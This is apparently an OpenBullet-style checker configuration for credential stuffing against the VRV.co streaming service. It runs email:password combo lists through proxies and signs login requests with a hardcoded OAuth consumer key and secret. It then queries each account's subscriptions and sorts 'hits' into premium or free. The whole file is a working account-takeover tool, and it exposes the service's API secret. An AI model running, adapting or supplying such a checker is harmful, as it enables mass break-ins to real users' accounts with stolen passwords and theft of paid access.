[SETTINGS]
{
  "Name": "VRV.co",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-23T13:01:12.3963446+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "VRV PREMIUM",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#NONCE FUNCTION RandomString "?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i" -> VAR "NONCE" 

#TIME FUNCTION CurrentUnixTime -> VAR "TIME" 

#EMAIL FUNCTION URLEncode "<USER>" -> VAR "EMAIL" 

#PASSWORD FUNCTION URLEncode "<PASS>" -> VAR "PASSWORD" 

SET VAR "URL" "https://api.vrv.co/core/authenticate/by:credentials"
SET VAR "KEY" "OvqR158Z9212i41UkNRzooutpU9Vp0vuXD9K0zKAvJdXPh6LfMOro4stVQRS"
SET VAR "SECRET" "EBgJav6Z99M9jFLzcexL6iETovNGbobFAJGudkDKMloqaBJgdo9u3WNuumM1&"
SET VAR "PARAMS" "email=<EMAIL>&oauth_consumer_key=<KEY>&oauth_nonce=<NONCE>&oauth_signature_method=HMAC-SHA1&oauth_timestamp=<TIME>&oauth_version=1.0&password=<PASSWORD>"

#URL FUNCTION URLEncode "<URL>" -> VAR "URL" 

#PARAMS FUNCTION URLEncode "<PARAMS>" -> VAR "PARAMS" 

SET VAR "BODY" "POST&<URL>&<PARAMS>"

#HMAC_SIGNATURE FUNCTION HMAC SHA1 "<SECRET>" HmacBase64=TRUE "<BODY>" -> VAR "AUTH" 

#SIGNATURE_ENCODE FUNCTION URLEncode "<AUTH>" -> VAR "SIGNATURE" 

#LOGIN REQUEST POST "https://api.vrv.co/core/authenticate/by:credentials" EncodeContent=TRUE 
  CONTENT "email=<USER>&password=<PASSWORD>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.vrv.co" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 
  HEADER "Authorization: OAuth oauth_consumer_key=\"<KEY>\", oauth_nonce=\"<NONCE>\", oauth_signature=\"<SIGNATURE>\", oauth_signature_method=\"HMAC-SHA1\", oauth_timestamp=\"<TIME>\", oauth_version=\"1.0\"" 
  HEADER "Origin: https://vrv.co" 
  HEADER "Referer: https://vrv.co/" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "account_id" 
  KEYCHAIN Failure OR 
    KEY "Authentication failed" 
    KEY "Request signature mismatch" 

#NONCE FUNCTION RandomString "?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i?i" -> VAR "NONCE" 

#TIME FUNCTION CurrentUnixTime -> VAR "TIME" 

#CONSUMER_KEY PARSE "<SOURCE>" LR "oauth_client_key\":\"" "\"," -> VAR "CONSUMER_KEY" 

#OAUTH_TOKEN PARSE "<SOURCE>" LR "oauth_token\":\"" "\"," -> VAR "OAUTH_TOKEN" 

#OAUTH_SECRET PARSE "<SOURCE>" LR "oauth_token_secret\":\"" "\"," -> VAR "OAUTH_SECRET" 

#ID PARSE "<SOURCE>" LR "account_id\":\"" "\"," -> VAR "ID" 

SET VAR "PART1" "https://api.vrv.co/core/accounts/<ID>/subscription/subscribed_products"
SET VAR "PART2" "oauth_consumer_key=<CONSUMER_KEY>&oauth_nonce=<NONCE>&oauth_signature_method=HMAC-SHA1&oauth_timestamp=<TIME>&oauth_token=<OAUTH_TOKEN>&oauth_version=1.0"

#URL FUNCTION URLEncode "<PART1>" -> VAR "URL" 

#DATA FUNCTION URLEncode "<PART2>" -> VAR "BASE" 

SET VAR "GETSUB" "GET&<URL>&<BASE>"

#HMAC_SIGNATURE FUNCTION HMAC SHA1 "<SECRET><OAUTH_SECRET>" HmacBase64=TRUE "<GETSUB>" -> VAR "SIGNATURE" 

#SIGNATURE_ENCODE FUNCTION URLEncode "<SIGNATURE>" -> VAR "SIGNATURE" 

#GET_SUBS REQUEST GET "https://api.vrv.co/core/accounts/<ID>/subscription/subscribed_products" 
  
  HEADER "Host: api.vrv.co" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 
  HEADER "Authorization: OAuth oauth_consumer_key=\"<CONSUMER_KEY>\", oauth_nonce=\"<NONCE>\", oauth_signature=\"<SIGNATURE>\", oauth_signature_method=\"HMAC-SHA1\", oauth_timestamp=\"<TIME>\", oauth_token=\"<OAUTH_TOKEN>\", oauth_version=\"1.0\"" 
  HEADER "Origin: https://vrv.co" 
  HEADER "Referer: https://vrv.co/" 

#LIST PARSE "<SOURCE>" LR "subscribable_id\":\"" "\"," Recursive=TRUE CreateEmpty=FALSE -> VAR "Sub" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Sub>" DoesNotExist 
  KEYCHAIN Success OR 
    KEY "<Sub>" Exists 

#TRANSLATE FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "combopack" VALUE "VRV Premium Bundle" 
  "<Sub>" -> CAP "Subs" 

